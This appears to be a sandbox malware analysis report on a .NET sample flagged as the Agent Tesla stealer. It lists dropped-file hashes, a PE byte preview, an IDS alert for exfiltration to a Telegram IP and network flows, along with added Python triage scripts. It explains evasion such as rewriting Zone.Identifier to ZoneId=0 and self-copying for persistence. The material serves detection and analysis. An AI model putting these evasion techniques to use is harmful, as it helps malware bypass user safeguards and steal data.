SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut
Process:C:\Users\user\Desktop\file.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):1459
Entropy (8bit):5.3420905847574325
Encrypted:false
SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
MD5:FB4B7720101F874710FF986326F7980F
SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
Malicious:true
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut
Process:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1459
Entropy (8bit):5.3420905847574325
Encrypted:false
SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
MD5:FB4B7720101F874710FF986326F7980F
SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut
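The three 1459-byte records above share one SHA-256 because file.exe and both dropped copies (Qasvjoldkyh.exe, kDPmkTm.exe) each wrote the same .NET CLR assembly usage log, the per-process log that .NET Framework 4.x keeps under %LocalAppData%\Microsoft\CLR_v4.0_32\UsageLogs (the report shows the content but not the path). For an analyst that file is a cheap pivot: it names the managed process that ran and the framework assemblies it pulled in. The parser below is an added example written for this page, not part of the Joe Sandbox report or of the sample; its input is constructed from the preview shown above with the report's ".." rendering of CRLF restored, and the final record is left cut off exactly where the preview truncates it. The leading integer and trailing flag of each record are not documented on this page, so the code carries them through without interpreting them.

```python
"""Parse a .NET CLR assembly usage log (the 1459-byte dropped file above).

Added example for this report. Sample input is constructed from the report's
own preview; record kind and flag semantics are not given on the page and are
passed through uninterpreted.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed input: the preview from the report with its ".." CRLF rendering
# restored. The last record is cut off where the report truncates the preview.
_PREVIEW_LINES = [
    '1,"fusion","GAC",0',
    '1,"WinRT","NotApp",1',
    '2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0',
    r'3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0',
    r'3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0',
    r'3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0',
    r'3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0',
    '2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut',  # truncated in the report
]
USAGE_LOG = "\r\n".join(_PREVIEW_LINES)

# One record per line: kind,"name"[,"detail"],flag. Display names and native
# image paths contain no embedded quotes, so a simple pattern is sufficient.
_RECORD_RE = re.compile(r'^(\d+),"([^"]*)"(?:,"([^"]*)")?,(\d+)$')


@dataclass(frozen=True)
class UsageRecord:
    kind: int              # leading integer; not interpreted here
    name: str              # tag ("fusion", "WinRT") or assembly display name
    detail: Optional[str]  # "GAC"/"NotApp" on the tag records, native image path on assembly records
    flag: int              # trailing integer; not interpreted here

    @property
    def simple_name(self) -> str:
        # "System.Xml, Version=4.0.0.0, ..." -> "System.Xml"
        return self.name.split(",", 1)[0].strip()

    @property
    def is_assembly(self) -> bool:
        # Assembly records carry a full display name with a Version= part.
        return "Version=" in self.name


def parse_usage_log(text: str) -> Tuple[List[UsageRecord], List[str]]:
    """Return (complete records, lines that did not parse).

    A line that fails the pattern is usually a record cut off by truncation,
    as in the report preview; it is returned separately so the caller sees it
    instead of it being silently dropped or half-parsed.
    """
    records: List[UsageRecord] = []
    rejected: List[str] = []
    for line in text.splitlines():
        if not line:
            continue
        m = _RECORD_RE.match(line)
        if not m:
            rejected.append(line)
            continue
        kind, name, detail, flag = m.groups()
        records.append(UsageRecord(int(kind), name, detail, int(flag)))
    return records, rejected


def loaded_assemblies(records: List[UsageRecord]) -> List[str]:
    """Simple names of the assemblies listed, in log order, without duplicates."""
    seen: List[str] = []
    for r in records:
        if r.is_assembly and r.simple_name not in seen:
            seen.append(r.simple_name)
    return seen


def native_images(records: List[UsageRecord]) -> Dict[str, str]:
    """Map assembly simple name -> native image (.ni.dll) path where one is recorded."""
    return {
        r.simple_name: r.detail
        for r in records
        if r.is_assembly and r.detail and r.detail.lower().endswith(".ni.dll")
    }


if __name__ == "__main__":
    recs, rejected = parse_usage_log(USAGE_LOG)
    print(f"{len(recs)} records, {len(rejected)} unparsed line(s)")
    print("assemblies:", ", ".join(loaded_assemblies(recs)))
    for name, path in native_images(recs).items():
        print(f"  {name:<22} {path}")
    for line in rejected:
        print("unparsed (truncated?):", line[:60])
```

On a live host, feed the full file instead of the constructed preview (`parse_usage_log(open(path, encoding="utf-8").read())`); the same SHA-256 turning up for a usage log in three different processes, as here, is what tells you the three binaries loaded an identical assembly set, which is consistent with the dropped copies being the same payload.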
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):5829
Entropy (8bit):4.902247628650607
Encrypted:false
SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
MD5:F948233D40FE29A0FFB67F9BB2F050B5
SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
Malicious:false
Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):15596
Entropy (8bit):5.5531622815475545
Encrypted:false
SSDEEP:384:Fte/bq0uRu2AH68SBxnuilrIaBsFv917NnlZ:VA/4xuilrwxplZ
MD5:9EF84D725C2607A4AED65AD3158C3AB1
SHA1:9BAB855CB21B192916AD2E728A2A7447ED986BA2
SHA-256:5F70DC72B68DB5E131213081C0B253710ABD4F42EBA9BB0449E4ADED30F3070F
SHA-512:7799E2FA990922355A2DC76BECA969FFCA860060C2CFAFF89A9F9A6E935ACE4747351181570411422BB3AA9B3F83507E8F9E6764090EF7F2EF4918F07E4A1189
Malicious:false
Preview:@...e...........$.......$...N.A.A.....1.........................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1
The same 1-byte file (content "1", MD5 C4CA4238A0B923820DCC509A6F75849B) is listed four more times as dropped by powershell.exe; those four records are identical to the one above.

Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1825280
Entropy (8bit):5.291589770491668
Encrypted:false
SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
MD5:2DDEC3A033A6DED2EC135BB2F3EC897D
SHA1:CB40F86B808C7B7812FFF7820DC596D3A78E5760
SHA-256:BB4297E1D60FBF0C9670F3A436D3C00993307CCF5BBF9BADE4A6EBCB608EDD6C
SHA-512:12FE7E8088D62A32F53BA9DB9E425D41F8C95DEA742AF3E7BEECC8CAE50E97E9573EBFA839EC339D57804B32C2A864110F9135BCDE8123C2B5D10A1E3B4C7C38
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 36%
• Antivirus: Virustotal, Detection: 44%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`.....................................J.......0.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc....... ......................@..B........................H.......09..t.......4....U.............................................N.(.....-.+.(-...+.*^+..-.&+......+.*s....+..0..M.......+#,.+&+'+(.-.&+.+'+.*+)+*.-.&&+.+$+.*(....+..+..+.s1...+.(....+..+..+.(....+.....0..T.......++,.+.+/+0+1.-.&+.+0+.*+2+3+4.-.&&&+.(....+.*(....+..+..+..+.s@...+.(....+..+..+..+..0..G.......+#,..-..-.+ +!.-.&+.+ +.*.,.+.+ &.,.*(....+..+.s5...+.(....+..+.(....+...0..H.......+$,.+'+(.-.&.,..-.+.+!+.*+#.-.&+.+.+.*(....+..+.sV...+.(....+..+.(....+..0..O...

Process:C:\Users\user\Desktop\file.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0

Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1825280
Entropy (8bit):5.291589770491668
Encrypted:false
SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
MD5:2DDEC3A033A6DED2EC135BB2F3EC897D
SHA1:CB40F86B808C7B7812FFF7820DC596D3A78E5760
SHA-256:BB4297E1D60FBF0C9670F3A436D3C00993307CCF5BBF9BADE4A6EBCB608EDD6C
SHA-512:12FE7E8088D62A32F53BA9DB9E425D41F8C95DEA742AF3E7BEECC8CAE50E97E9573EBFA839EC339D57804B32C2A864110F9135BCDE8123C2B5D10A1E3B4C7C38
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 36%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`.....................................J.......0.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc....... ......................@..B........................H.......09..t.......4....U.............................................N.(.....-.+.(-...+.*^+..-.&+......+.*s....+..0..M.......+#,.+&+'+(.-.&+.+'+.*+)+*.-.&&+.+$+.*(....+..+..+.s1...+.(....+..+..+.(....+.....0..T.......++,.+.+/+0+1.-.&+.+0+.*+2+3+4.-.&&&+.(....+.*(....+..+..+..+.s@...+.(....+..+..+..+..0..G.......+#,..-..-.+ +!.-.&+.+ +.*.,.+.+ &.,.*(....+..+.s5...+.(....+..+.(....+...0..H.......+$,.+'+(.-.&.,..-.+.+!+.*+#.-.&+.+.+.*(....+..+.sV...+.(....+..+.(....+..0..O...

Process:C:\Users\user\Desktop\file.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0

File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):5.291589770491668
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name:file.exe
File size:1825280
MD5:2ddec3a033a6ded2ec135bb2f3ec897d
SHA1:cb40f86b808c7b7812fff7820dc596d3a78e5760
SHA256:bb4297e1d60fbf0c9670f3a436d3c00993307ccf5bbf9bade4a6ebcb608edd6c
SHA512:12fe7e8088d62a32f53ba9db9e425d41f8c95dea742af3e7beecc8cae50e97e9573ebfa839ec339d57804b32c2a864110f9135bcde8123c2b5d10a1e3b4c7c38
SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
TLSH:5D855BF20283FEC5A76F1D4484143940AC1418676BBC9768FDC92A97A3E9524EF9DEF0
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`................................
Icon Hash:00828e8e8686b000
Entrypoint:0x5beeda
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x6418981C [Mon Mar 20 17:30:04 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744 (the imphash shared by practically every .NET assembly, whose only native import is mscoree.dll!_CorExeMain; it identifies the CLR loader stub, not this sample, so do not pivot or cluster on it)
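The dropped-file records and the static PE fields above can be cross-checked offline without the sample. The script below is an added example for this page, not Joe Sandbox code: it re-derives three of the report's signatures from the values listed. Dropped PE files whose SHA-256 equals the submitted sample are a self-copy (the sample wrote a byte-identical copy of itself, which fits "Creates multiple autostart registry keys"); a Zone.Identifier stream written with ZoneId=0 (Local Machine) is what the "Hides that the sample has been downloaded from the Internet" finding refers to, because SmartScreen and Office Protected View only act on ZoneId 3 or 4; and the TimeDateStamp is decoded to confirm the bracketed date. Hash, size and timestamp values are copied from the report; the path headers of the dropped files were lost in extraction, so records are keyed by writing process only. The Zone.Identifier body is constructed to fit the 26-byte preview (the real bytes were not captured), and the record keys and function names are this example's own.

```python
"""Cross-check three of this report's findings against the raw values it lists.

Added example for this page; it is not Joe Sandbox code. Record values are copied
from the dropped-file entries and the static PE fields above. The Zone.Identifier
body is CONSTRUCTED to fit the 26-byte preview "[ZoneTransfer]....ZoneId=0"; the
record keys and function names are this example's own.
"""
import hashlib
from datetime import datetime, timezone

# Submitted sample (General Information / File name: file.exe).
SAMPLE_SHA256 = "bb4297e1d60fbf0c9670f3a436d3c00993307ccf5bbf9bade4a6ebcb608edd6c"
PE_TIME_DATE_STAMP = 0x6418981C   # IMAGE_FILE_HEADER.TimeDateStamp as listed above

# Dropped-file records as listed (path headers were lost in extraction).
DROPPED = [
    {"process": "powershell.exe", "category": "dropped", "size": 1,
     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
     "preview": b"1"},
    {"process": "file.exe", "category": "dropped", "size": 1825280,
     "sha256": SAMPLE_SHA256, "preview": b"MZ"},
    {"process": "file.exe", "category": "dropped", "size": 26,
     "sha256": "255a65d30841ab4082bd9d0eea79d49c5ee88f56136157d8d6156aef11c12309",
     "preview": b"[ZoneTransfer]"},
    {"process": "file.exe", "category": "dropped", "size": 1825280,
     "sha256": SAMPLE_SHA256, "preview": b"MZ"},
    {"process": "file.exe", "category": "modified", "size": 26,
     "sha256": "255a65d30841ab4082bd9d0eea79d49c5ee88f56136157d8d6156aef11c12309",
     "preview": b"[ZoneTransfer]"},
]

# Constructed 26-byte Zone.Identifier stream (see module docstring).
ZONE_ADS = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# URLMON security zones as written into Zone.Identifier by browsers and mail clients.
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}


def parse_zone_identifier(ads: bytes) -> dict:
    """Return the key/value pairs of the [ZoneTransfer] section; ZoneId as int."""
    section, out = None, {}
    for raw in ads.decode("ascii", "replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            out[key.strip()] = value.strip()
    if "ZoneId" in out:
        out["ZoneId"] = int(out["ZoneId"])
    return out


def motw_downgraded(ads: bytes) -> bool:
    """True when the stream marks the file as coming from a zone below Internet (3).
    SmartScreen, Office Protected View and the "unblock" prompt key off ZoneId 3/4,
    so a Zone.Identifier deliberately written with ZoneId=0 strips Mark-of-the-Web."""
    zone = parse_zone_identifier(ads).get("ZoneId")
    return zone is not None and zone < 3


def self_copies(records: list, sample_sha256: str) -> list:
    """Dropped files that are byte-identical to the submitted sample."""
    return [r for r in records if r["sha256"].lower() == sample_sha256.lower()]


def preview_is_whole_file(record: dict) -> bool:
    """For tiny files the preview may be the entire content; confirm via SHA-256."""
    return (len(record["preview"]) == record["size"]
            and hashlib.sha256(record["preview"]).hexdigest() == record["sha256"].lower())


def pe_timestamp(time_date_stamp: int) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch, in UTC."""
    return datetime.fromtimestamp(time_date_stamp, tz=timezone.utc)


def triage(records=DROPPED, sample_sha256=SAMPLE_SHA256,
           zone_ads=ZONE_ADS, time_date_stamp=PE_TIME_DATE_STAMP) -> list:
    """Produce the findings a human wants at the top of the dropped-file section."""
    findings = []
    copies = self_copies(records, sample_sha256)
    if copies:
        findings.append(f"self-copy: {len(copies)} dropped file(s) identical to the sample "
                        f"(sizes {sorted({r['size'] for r in copies})})")
    if motw_downgraded(zone_ads):
        zone = parse_zone_identifier(zone_ads)["ZoneId"]
        findings.append(f"MOTW stripped: Zone.Identifier written with ZoneId={zone} "
                        f"({ZONE_NAMES.get(zone, 'unknown')})")
    for r in records:
        if preview_is_whole_file(r):
            findings.append(f"{r['process']} wrote a {r['size']}-byte file whose entire "
                            f"content is {r['preview']!r}")
    findings.append(f"compile timestamp {pe_timestamp(time_date_stamp):%Y-%m-%d %H:%M:%S} UTC")
    return findings


if __name__ == "__main__":
    for line in triage():
        print("-", line)
```

The ZoneId threshold is the practical one: a file that arrived via a browser or mail client carries ZoneId=3 (or 4), so a stream rewritten to 0, 1 or 2 by the sample itself is evidence of deliberate Mark-of-the-Web removal rather than a local-origin file. The hash comparison also shows that the powershell.exe drop really is the single byte "1", so it is a command's output, not a payload.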
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the second instruction is repeated 97 times in the listing: it is the 00 00 zero padding after the six-byte stub, not code)
For a 32-bit .NET assembly the native entry point is only this indirect jmp through the import address table (RVA 0x2000, inside .text) to mscoree!_CorExeMain; the sample's own logic starts at the managed entry point once the CLR is loaded, so this disassembly carries no sample-specific behaviour.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1bee90         0x4a          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1c0000         0x530         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1c2000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x1bcee0      0x1bd000  False     0.4746565572331461  data       5.286588181165908    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x1c0000         0x530         0x600     False     0.3938802083333333  data       3.806174196677056    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x1c2000         0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                                                                                                         Language  Country
RT_VERSION   0x1c005c  0x2e4  data
RT_MANIFEST  0x1c037c  0x1b4  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                  Source Port  Dest Port  Source IP    Dest IP
03/20/23-19:39:50.282462  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49702        443        192.168.2.4  149.154.167.220
03/20/23-19:38:26.620974  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49698        443        192.168.2.4  149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Mar 20, 2023 19:38:19.603668928 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:19.603749990 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:19.603835106 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:19.630438089 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:19.630492926 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.328294039 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.328383923 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:20.340078115 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:20.340123892 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.340564966 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.380551100 CET  49697        443        192.168.2.4      104.237.62.211
